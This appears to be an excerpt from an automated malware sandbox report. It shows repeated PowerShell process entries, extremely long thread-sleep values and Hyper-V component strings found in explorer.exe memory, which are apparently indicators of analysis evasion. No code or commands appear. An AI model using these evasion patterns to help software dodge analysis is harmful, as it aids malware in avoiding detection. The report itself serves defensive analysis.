      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5893Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3886Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8053
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1618
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4488
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1991
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7405
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1509
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4368Thread sleep count: 5893 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4368Thread sleep count: 3886 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -11068046444225724s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep count: 8053 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3184Thread sleep count: 1618 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep count: 4488 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep count: 1991 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4620Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1824Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep count: 7405 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep count: 1509 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2736Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc9694c595902f8cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.19041.1_en-us_a3e0d97c4c052586cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bdamumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8326mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b28141339200a5279026mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.19041.1_none_43a9017744e82ca8cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b50mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.19041.1_none_a7bb53746630ebd34c771f203a7mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e291981mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c2489cd4d0mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2cf09487ebd5c11bd5cdmumm949.mummm65.mumum
